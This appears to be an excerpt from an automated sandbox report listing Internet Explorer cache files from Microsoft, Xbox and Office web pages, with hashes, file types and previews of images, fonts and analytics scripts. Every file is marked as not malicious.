                                                                                                                                                                                                              SSDEEP:96:Axtr8zrWdGJrePQreP/creP3OrePBprxL5C2LejcMyejc1dejczaeKOCRLKF49NS:ASGdFPdPZPfPvrxlC2LwcMywc1dwczas
                                                                                                                                                                                                              MD5:5A49CF6D005E7A1DA02AD87E6177CA7B
                                                                                                                                                                                                              SHA1:74291567C66C9796C6F45B323E11F40762BA13F1
                                                                                                                                                                                                              SHA-256:D0069995CA33EA3373CB6686D1C5F9E0FDA6F8D098E6BCE537B0AFDD7908A2DE
                                                                                                                                                                                                              SHA-512:3C06E2BC2F50B10A03A28D432167CEE75CC5C69496D79796572B927B8DA272D7C64D446D7D669DBBDCC7BD4F021FCFF674B0928DAE6F3E59BD173A7935D91C89
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RWBtR2
                                                                                                                                                                                                              Preview: {"captions":{"en-us":{"url":"https://prod-video-cms-rt-microsoft-com.akamaized.net/cms/api/am/videofiledata/RWBtR2-enus?ver=3c21","link":{"href":"/vhs/api/videos//captions/en-us","method":"GET","rel":"self"}}},"transcripts":{"en-us":{"url":"https://prod-video-cms-rt-microsoft-com.akamaized.net/cms/api/am/videofiledata/RWBtR2-tscriptenus?ver=2f1c","link":{"href":"/vhs/api/videos//transcripts/en-us","method":"GET","rel":"self"}}},"snippet":{"activeStartDate":"2021-04-15T18:11:45","culture":"en-us","supplier":{"name":"","source":{"name":""}},"thumbnails":{"extrasmall":{"height":0,"width":0,"assetId":"RWBwbc","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWBwbc?ver=a64d","link":{"href":"/vhs/api/videos//thumbnails/extrasmall","method":"GET","rel":"self"}},"small":{"height":0,"width":0,"assetId":"RWBwbc","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWBwbc?ver=a64d","link":{"href":"/vhs/api/videos//thumbnails/small","
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RWBwbc[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 1920 x 1080, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1806069
                                                                                                                                                                                                              Entropy (8bit):7.998147617181066
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:49152:THjwPvXRBZw0qcvnemZZu3DXiWWPLC6Wxb:TjwHBLw0pPeXDXtWPLOb
                                                                                                                                                                                                              MD5:953AF4D2E30FF485E28D65BDA121B47D
                                                                                                                                                                                                              SHA1:2EC89509B9592033BE9F807FBC36BB2B62DA4433
                                                                                                                                                                                                              SHA-256:A2525F2D0E264353D6DE0E9DF7447AF006681362A1CFBC35B48EA7986781D2D7
                                                                                                                                                                                                              SHA-512:905D93E040BA48327C44F6F607437BB3B39FEEF612FE6B957859A1ED8CCF2591DCCEC9F9961ED6EE39C3813C45C3CDBE5628877831F278CEB55F829346AA30E7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWBwbc?ver=a64d
                                                                                                                                                                                                              Preview: .PNG........IHDR.......8.....g.V...&.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c003 79.164527, 2020/10/15-17:48:32 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:xmpDM="http://ns.adobe.com/xmp/1.0/DynamicMedia/". xmlns:bext="http://ns.adobe.com/bwf/bext/1.0/". xmlns:iXML="http://ns.adobe.com/ixml/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:creatorAtom="http://ns.adobe.com/creatorAtom/1.0/". xmlns:stDim="http://ns.adobe.com/xap/1.0/sType/Dimensions#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmpMM:InstanceID="xmp.iid:d540fc7d-d77b-4904-a05d-b94f8d541478".
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RWlMFC[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):205
                                                                                                                                                                                                              Entropy (8bit):6.492649338746937
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:yionv//thPlVXtJZ1MtMlixYlQH5odknAi1yfPK8TojolwMFcJ+AwyYMrG3vNg7u:6v/lhPnMtk9lU5nAZK8UMA+tN57ePmp
                                                                                                                                                                                                              MD5:C5340D2DB4396360547D96975B0678B6
                                                                                                                                                                                                              SHA1:D8C1B8AC86403630F48579F0E152ED3B4B6CFC28
                                                                                                                                                                                                              SHA-256:BF176AF8C0412E7E6870EC9B9B8F8C55839E1358DEBFE364220B1196BD119C72
                                                                                                                                                                                                              SHA-512:F99D8A4B25C832697C89FEA9551194E326570472C9350C5585BC6F14815F5C615186A3B8FE80E017ACCD37D2726DE73BFCDB05EDDE8E922D40D9CD72AC06930A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWlMFC?ver=9787&q=90&m=6&h=40&w=40&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...(...(.....&.p.....orNT..w.....IDATH...A..0..._.....I....2.H@B%..B8..u....i./Y...TFM.w..X..0.~.....l.%...}...'.........3Y.].c%w.CzH5.He..Q.&73..,.....d..W...|.......B.M....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RWlzKg[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):605
                                                                                                                                                                                                              Entropy (8bit):7.554567462765926
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7PiSyAyVh/d1OzBesWT9vEq7RggSLmHhv52StjgHhzOUaTb+XqXPQUpc:+G1r/CtesWtXRl72StjwSPf+oi
                                                                                                                                                                                                              MD5:68DB9CAD0816952939B55B764764C8A7
                                                                                                                                                                                                              SHA1:8789549936BC254FD47900A574DF4334FFAE2138
                                                                                                                                                                                                              SHA-256:D8770B27A97A927E0E973D27F89D852048E46E67AB591644AFF18AEE5A599A50
                                                                                                                                                                                                              SHA-512:5A68335A125FE77258CC98D69BEB968B97607D3AE66347C9682B27D9A6583A1490C1BE54C6D01DB3C4B2261B6DA6ED0C7362E079B3277129DD5C0BBA31811DA0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWlzKg?ver=8d3a&q=90&m=6&h=40&w=40&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...(...(.....&.p.....orNT..w.....IDATH...?H.a...Oq..*.PABP`[{.... YI.BCAK.Kg65......D...QmeB..-...[,.3.....^....s(..,........}...u....f..=.....V.8d. .a.6W..3#....!...&.bZ.5$i.Ss.....o...q....b..%..q_\...T0Q.%=.9V....mU.n7).~%q^pxU.yXp.4...q7..B"...)e......de.......}....4T`.>z\.8 H.d...uyxE..&.....v....i..K;).Y.G..yG.....r......t....9*.Z...A'.EE...4.\.1.6.iO..ec...q...&-/.D^.L/..........\uV....w.U9...Xw.2....*.....`....-.......'....L..#^.+Ju.<..~..E...c.0..K.7.E.E....F;.J.j..[qD.[.........[<0g?...H)xgo...;.).EN/&.=S0.yU.ivO.......'.#.q..m@....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\SegoePro-Black[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):125464
                                                                                                                                                                                                              Entropy (8bit):6.005747342459591
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:1gZ0lpUf8n9f7zQV1XrXtISFDnrcqFxg4qr81/+zShv4uu:pOknlgDXr9IALgqFX1/+Ohv4uu
                                                                                                                                                                                                              MD5:1970BFEAE2E945AD818D3BD5F166DEE7
                                                                                                                                                                                                              SHA1:B69A02687FAE164033DB12D3C4C908157DF09CE3
                                                                                                                                                                                                              SHA-256:E40CC7890C76AAE8DB25F13A77B9A239CB731D06BBF95B3949DE070B38E972F6
                                                                                                                                                                                                              SHA-512:066784D07C899E540E95FC81B60D24DAB881D3EA277EA9622F077B4A28323F29DF43ABE582C4BDA69032A223143117C393050A998A684947E2FEF33107540B86
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/global-resources/fonts/SegoePro-Black.css
                                                                                                                                                                                                              Preview: @font-face {. font-family: 'SegoeProBlack';. src: url(data:application/font-woff2;charset=utf-8;base64,d09GMgABAAAAAJ2cABIAAAABeIQAAJ0wAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGh4bgZpyHIYwBmAAiQ4IgUgJjzQREAqD1TiDlEILikIAATYCJAOVAAQgBZFuB6ddDIIyW45RcQa36Syk6Hc7gGd/6t+9QDm2o3Qn2mpUov/XFh3BYeMAGL8PzNn///+/IpnEmF4OvCR5+FIKWqtK67oNYu7hYbOqJWqaW2vNFDIz0SpLMXt1LwXeCsplqndf62PbJjRBYrvoHE4lKrHl7CQcbi+fptH1zK7+xTZ3dnNnLirZ2TjOfCMrLkXVqMQEMUFMEBO8bOK++1C/u7mFK66VyJQqMaXJx25u+VWdhD5lZuXQJz+Gy0Zf76GF1aC1ICO8u4vJaD0QPMj0dBSeZTrCPNiKRs7s2DuCid9PZfrAVUc3zr81OFFCGo23TVK3IosjQhJ+8DKBsEqZ2x94yv5iC/IXB9M+4JvucCaI6QSW20OTY34dc9XW0Ub75c59WPEujeEncPFX2syp9+YzHsMbFdeYwf/9Z+7OttGXgbHLoEQbseLEC0Xt91j37Ab4hUmiS0UBkAJUiY5CcKQQFAiFdMTuhDmJP2+A3NapuCbiXLhwoBtUQBREloCgqLgnjrlyZe4MLd2NrVnbcjXNrKytb1O/7+t/+G3+fU+wjgcdJsaeMQ/zsOK81fvuLTmKxVf0YfMRlVU6rMIci+Q/ZyyLFdt/n1U4V8wVK1YsWBRzJf+nU/8/ncAIYeWpcgDoQmRZhgBKLo60dboSbR1Dw6hsaaaspbd364g4NX/Vyuqf+3PAcIjw4MzIrKqsYmWLBlC7qy1ht7qkUdOMhk+Lmj0BfyQ+/ROfgA+XsW93pCiW/+vZ/7g
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\SurfaceHome_Lg_LinkNav_Panel_2_image1[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1161
                                                                                                                                                                                                              Entropy (8bit):4.484268885657083
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:twcB464wj4pR5N7GPzP+S2VlsRoOY4TLSzitiWjbr7Nzeh+8jw:VrALUzP+SygoCLSzipbr7vF
                                                                                                                                                                                                              MD5:6F974ACB4E979FD3445E79E49FE72B82
                                                                                                                                                                                                              SHA1:950ED5BC60777B284956E8CCC418346BB5F905E6
                                                                                                                                                                                                              SHA-256:85BFC00A602796E9A5D55DE82F47042EE0D8BD735B213D6AE5C6ECE995783458
                                                                                                                                                                                                              SHA-512:4DCCD2A891DBE8A923EDEA65FA43393881A19BDF294446C8B70BF7EDF5C5AE557A6D35C1CD5E704B8E531F9041354DE48567E638075A46D12BFEBFD95795DC6A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/SurfaceHome_Lg_LinkNav_Panel_2_image1.svg?version=9257ec5f-8430-88a9-e2cd-c455f7ce172c
                                                                                                                                                                                                              Preview: <svg enable-background="new 0 0 27 21" viewBox="0 0 27 21" xmlns="http://www.w3.org/2000/svg"><switch><foreignObject height="1" requiredExtensions="http://ns.adobe.com/AdobeIllustrator/10.0/" width="1"/><path d="m26.325 15.745c.103.103.197.237.281.401s.155.338.211.52c.056.183.101.366.134.548s.049.345.049.486c0 .234-.049.459-.148.675-.098.216-.232.408-.401.577s-.361.302-.577.401c-.215.098-.44.147-.674.147h-23.4c-.234 0-.459-.049-.675-.148-.216-.098-.408-.232-.577-.401s-.302-.361-.401-.577-.147-.44-.147-.674c0-.141.016-.302.049-.485s.077-.366.134-.548c.056-.183.127-.356.211-.52s.178-.298.281-.401l2.925-2.926v-11.32h19.8v11.32zm-1.125 1.913c0-.038-.007-.091-.021-.162-.014-.07-.033-.141-.056-.211s-.047-.138-.07-.204-.049-.113-.077-.141l-2.856-2.84h-17.24l-2.855 2.841c-.028.028-.054.075-.077.141s-.047.134-.07.204-.042.141-.056.211c-.015.069-.022.123-.022.161l.042.042h23.316zm-19.8-5.358h9c0-.994.188-1.929.562-2.805s.888-1.641 1.54-2.292c.652-.652 1.416-1.165 2.292-1.54s1.812-.563 2.806-.563
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\SurfaceHome_Lg_LinkNav_Panel_2_image4[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1230
                                                                                                                                                                                                              Entropy (8bit):4.465658582341525
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:twcB464wjm3HwyrNSPXhypqHaG2Zzz7FfuKaEWbhyUAadSyh:VrCreXhygHaG29FfDS/fP
                                                                                                                                                                                                              MD5:9807E2D0143042B099454E83F29FD3C5
                                                                                                                                                                                                              SHA1:8FD51F53C496175F8C07733A8C17497E16B51F59
                                                                                                                                                                                                              SHA-256:B042FD8196D7BEB8048862F6E0819AE253980A415E123F88AC6816363DB3545A
                                                                                                                                                                                                              SHA-512:CEA0F87D718C623C0CA156BA311136932A6484F76A08698E87B9D89C13F5D05B45DB1E2B4E7ECB0D17C732F59B6C92C6A827B6058B51368D0ADFDC4F94AB2DD2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/SurfaceHome_Lg_LinkNav_Panel_2_image4.svg?version=f06b4b40-4b8b-535a-1bdc-60d370824ced
                                                                                                                                                                                                              Preview: <svg enable-background="new 0 0 27 21" viewBox="0 0 27 21" xmlns="http://www.w3.org/2000/svg"><switch><foreignObject height="1" requiredExtensions="http://ns.adobe.com/AdobeIllustrator/10.0/" width="1"/><path d="m21.312 4.214c.716.312 1.363.711 1.94 1.196.579.484 1.071 1.034 1.478 1.646.407.614.72 1.276.94 1.989.22.714.33 1.455.33 2.224 0 1.066-.204 2.065-.61 2.999-.407.934-.965 1.749-1.672 2.446-.709.697-1.537 1.246-2.485 1.647s-1.963.601-3.045.601c-.846 0-1.671-.13-2.472-.391-.801-.26-1.54-.643-2.215-1.148l-3.126 3.077-9.375-9.231 10.938-10.769h9.375v3.714zm-10.937 14.111 9.375-9.231v-3.786c-.146-.032-.326-.054-.537-.066-.211-.013-.433-.024-.666-.037-.231-.011-.462-.03-.689-.054-.228-.024-.434-.066-.617-.126-.184-.061-.332-.143-.446-.247s-.171-.248-.171-.433c0-.209.077-.389.231-.541.155-.152.339-.228.55-.228.399 0 .792.004 1.178.012s.775.056 1.166.144v-1.694h-7.165l-9.376 9.231zm7.813-.902c.863 0 1.673-.162 2.429-.487.758-.324 1.418-.765 1.984-1.322s1.014-1.208 1.343-1.953c.33-.745.4
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Surface_Lg_Generic_ContentPlacement_3UP_20_Acc_V1[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 485x273, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):30728
                                                                                                                                                                                                              Entropy (8bit):7.953210799904295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:KrDxTq/2nVE2T/Jq4J233XRnFyvh89kjLR6E2yfN:IxTKyVES/JMuvh89koGN
                                                                                                                                                                                                              MD5:3C20EE98F647F4F59C1EB22EF1419FAA
                                                                                                                                                                                                              SHA1:C23700733C7CCC6DFF940A44C94670F0E7CBCD29
                                                                                                                                                                                                              SHA-256:E671FB08F0A3F04D8987F207A7F4461F49FE28A953A607D956F870C7847E7A69
                                                                                                                                                                                                              SHA-512:09F6230F5A732742B49CCA67696DDD6E47C40F54BB700E221A6414E3839B740CB7D3DEC9EED174098A8BEDE05ED6CA44FBCF383DA8ED435581A2308DD2653111
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Lg_Generic_ContentPlacement_3UP_20_Acc_V1.jpg?version=0a81779c-5c7e-a61b-908c-4ce93f2a6950
                                                                                                                                                                                                              Preview: ......JFIF.............................................................................................................................................................................................................n..........1..knJ9s0.+y.."V=..*....u".......<...l..w...'!U).qW.q..7^...Z-y.s@........)A.:M..k'.W.."..).$.J....z.........@.......x...@.3.e.\.u...h.(..O.,.....R../.x.....5..*M.8.T.x.2.b..."..Vz..... .<..=...-/E]...S .tR\K"1.....J.8./C..@..Q .....-../?..Y&.....Ub..&VU.~..wh.@....b.G.x......}.}..&....$.=.....6...#yU.......NZ...L+._G:k.7......~..J.....s..^EU....9....p...m....6..3.;.U...M.J......B2.(....). .|?h.........O;Y....E....J.B.G..V..L?.....<..H.l....._....x...O9M.V.~.\.u.z3.UP.#5&%..Iu~V....U.l....N....K...K...V..0T..n..9ESW.G..4.1....6.Mfw...NM.a......n?.tu/P......:..<..r..5...b3....F'..?..}...W....~.a.#...~@...G...kZ[R..?I.n..h..[........=.....P.[.j.W.7.i*..?...d..f.N......iuHX....}u..+]....4...^..b_X.....,GN.=...'.....sb..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\a5fbc181-668c-4909-9702-6bdcbc033ef7[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, big-endian, direntries=16, height=3456, bps=0, compression=none, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS-1D X, orientation=upper-left, width=5184], baseline, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):43353
                                                                                                                                                                                                              Entropy (8bit):7.442546818923723
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:RHr1fysEXiV7or1fysEXifKlii/gmYyJw9kEOuelFLn7vyc0:p1B01ByWm9fE
                                                                                                                                                                                                              MD5:42FDCFB7DB536B4A0936ABF2CF58450E
                                                                                                                                                                                                              SHA1:D846D73D9A7F1969B5CF613B84C5D16C2CD39068
                                                                                                                                                                                                              SHA-256:4D6C798BB8BC961D04656DD4D23A06873AA3663A9A5CF220FFC332AF500146C7
                                                                                                                                                                                                              SHA-512:0DA0C08CDB91683C0ADF9E80D567C81CBFACD13CD3D4FAA6D7E7780DE6F5A489E945CD51AA4D3ADF698231138E632A11570024ECD5C82F18B50CD8550051EF59
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.content.office.net/en-us/media/a5fbc181-668c-4909-9702-6bdcbc033ef7.jpg
                                                                                                                                                                                                              Preview: .....+Exif..MM.*...............@.......................................................................................................................................(...........1.....".....2...........i.........0...p......Canon.Canon EOS-1D X.......'.......'.Adobe Photoshop CC 2019 (Windows).2020:04:13 09:48:54............................."...........'...........0...........2.................0230................................................................................................................38.........................f................................................................................................1...........2.........(.4.........H.5.........d....................2019:03:18 22:14:46.2019:03:18 22:14:46......B@.-T...B@...................d....................052011000029.....F............................EF70-200mm f/2.8L IS II USM.0000019e75.........................................(.................................U.......H.......H..........Adobe_CM
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\b359483c-b210-42fa-bc2d-da8b9a9b5fd6[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=17, height=4380, bps=218, compression=none, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark IV, orientation=upper-left, width=6570], baseline, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):35018
                                                                                                                                                                                                              Entropy (8bit):7.550378013798759
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:Zg70Lq0toRG3Oo4Ki4l6qG21uSmSVeM2KY2bQX4:6goG3Oo4KjkU1uPSVeMTYJX4
                                                                                                                                                                                                              MD5:F9ED45187ABD24F662B228C3D04149D0
                                                                                                                                                                                                              SHA1:75769CACFF0F6AB6EEB2538E272AD081B87EF813
                                                                                                                                                                                                              SHA-256:A82030FD6EC468924F2F76CD72FB4EA34ED7B079DA497319323139574C6504CF
                                                                                                                                                                                                              SHA-512:E80BC62AEA286D5602206BF71F3ED31EA045360A9E0CF4461A6FD6DA1D6554CA9ADF09445745AE6A573682F341DA3D9B301C579CBEC0188E55CCF9C5B30C7396
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.content.office.net/en-us/media/b359483c-b210-42fa-bc2d-da8b9a9b5fd6.jpg
                                                                                                                                                                                                              Preview: .....>Exif..II*.......................................................................................................................................................(...........1...".......2.......-...i.......D...%.....................Canon.Canon EOS 5D Mark IV...-..'....-..'..Adobe Photoshop CC 2019 (Windows).2020:04:13 09:46:06...."........................."...........'.......@...0...........2.......@...........0230............................................"...........*...........2...................................:...........00..........00......................f.......................B...........J.......................................................................................1.......R...2.......`...4...........5...................}...........2018:06:19 22:13:13.2018:06:19 22:13:13..Jj.@B...T-.@B..................?.........+.....@s0.....052023002581..........F.......................Canon EF 24-70mm f/2.8L II USM..4340002911..................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\broker[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):17209
                                                                                                                                                                                                              Entropy (8bit):5.330474935097972
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Tbk8rJfMtWCoD+pIa2yDV+8NUIWCcfVk9z5FJxoYWBg3xx8utYdR0cMobzwjn:nkrQCoD+qQiK/J7xB6d0cM3n
                                                                                                                                                                                                              MD5:1C8F3F66C4051C58FDC663DB2F8C9300
                                                                                                                                                                                                              SHA1:5DEF270DEF32EB03C1B1B61FBAD4D0D46EBAB24E
                                                                                                                                                                                                              SHA-256:CB20A7DDC4D9A1E1171B06C1BB8303A86CFAC4C4B1D22D17C1C5BBA79A210C93
                                                                                                                                                                                                              SHA-512:3EF342275AA251F7082436C452FA8FF691D03F33BC488248336FA74F6114B6BE84BD4D1C21C26947637442110B089AE59340174CC9737C4A046DE6F399EA521D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/library/svy/xbox/broker.js
                                                                                                                                                                                                              Preview: if(void 0===COMSCORE)var COMSCORE={};void 0===COMSCORE.SiteRecruit&&(COMSCORE.SiteRecruit={sv:"scor",testUrl:"broker-test.js",configUrl:"broker-config.js",builderUrl:"builder.js",CONSTANTS:{STATE_NAME:{IDLE:"IDLE",DDINPROGRESS:"DDINPROGRESS"}}},COMSCORE.SiteRecruit.Utils=function(){var r=COMSCORE.SiteRecruit;return{location:document.location.toString(),referrer:document.referrer.toString(),loadScript:function(e,t){t&&!r.allowScriptCaching&&(e=r.Utils.appendQueryParams(e,(new Date).getTime()));var i=document.createElement("script");i.src=e,document.body.appendChild(i)},cleanURL:function(e){var t=e.split("?");if(1<t.length){var r="?";if(/([^.@\s]+)(\.[^.@\s]+)*@([^.@\s]+\.)+([^.@\s]+)|%40/i.test(t[1])){var o=t[1].split("&");for(i=0;i<o.length;i++)/([^.@\s]+)(\.[^.@\s]+)*@([^.@\s]+\.)+([^.@\s]+)|%40/i.test(o[i])||(r+=0==i?o[i]:"&"+o[i]);e=1<r.length?t[0]+r:t[0]}}return e},getDevice:function(e,t){var i=new RegExp(e,"i"),r=navigator.userAgent,o=new RegExp(t,"i"),n=self.screen.availWidth>sel
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\bullet[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):447
                                                                                                                                                                                                              Entropy (8bit):7.304718288205936
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                                                              MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                                                              SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                                                              SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                                                              SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\c4-301a8f[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):364131
                                                                                                                                                                                                              Entropy (8bit):5.286066647726656
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:uZ3vc3zfwtwmyU4srxCqFOp03Mw1+/cg3poEjOJ2MVuGU:uZ3vc3bawmxxn917s
                                                                                                                                                                                                              MD5:027EAEEB674F4CA365546C2C13D3AF9D
                                                                                                                                                                                                              SHA1:891BA8C744D8F9DC94B9989240308DA9B292C931
                                                                                                                                                                                                              SHA-256:3CAA685BDE23C16D3FF532D0AF4A9EBF0699A2984553483C44E7CD90ABF4C069
                                                                                                                                                                                                              SHA-512:47B6B78A23E08ABB4F3E9469E6DADCF0BDE5A8BDF9243DA42A27A1E6F613D5CE98228C041785491ED384947DB8C8BEF8CCC1B60B40972FA5326D3B95828DF00B
                                                                                                                                                                                                              Malicious:false
